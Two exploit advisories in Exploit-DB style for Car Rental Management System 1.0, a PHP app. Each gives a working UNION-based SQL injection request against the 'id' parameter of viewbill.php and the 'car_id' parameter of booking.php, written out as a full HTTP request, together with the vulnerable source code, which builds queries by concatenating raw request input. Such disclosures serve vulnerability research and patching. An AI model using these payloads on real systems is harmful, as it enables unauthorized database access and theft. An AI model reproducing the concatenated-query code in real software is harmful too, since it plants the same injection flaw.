# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) # Date: 2020-11-14 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Apache2 and Windows 10 Vulnerable param: id ------------------------------------------------------------------------- GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Cookie: COOKIE Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------- Source Code: \WBS\viewbill.php .. .. .. $id =$_REQUEST['id']; $result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); .. .. ------------------------------- ---- # Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection # Date: 2020-11.13 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Apache2 - Windows 10 Vulnerable param: car_id ------------------------------------------------------------------------- GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Source Code: booking.php: -------------------------------------------------------------------- query("SELECT * FROM cars where id= ".$_GET['car_id']); foreach($qry->fetch_array() as $k => $val){ $$k=$val; }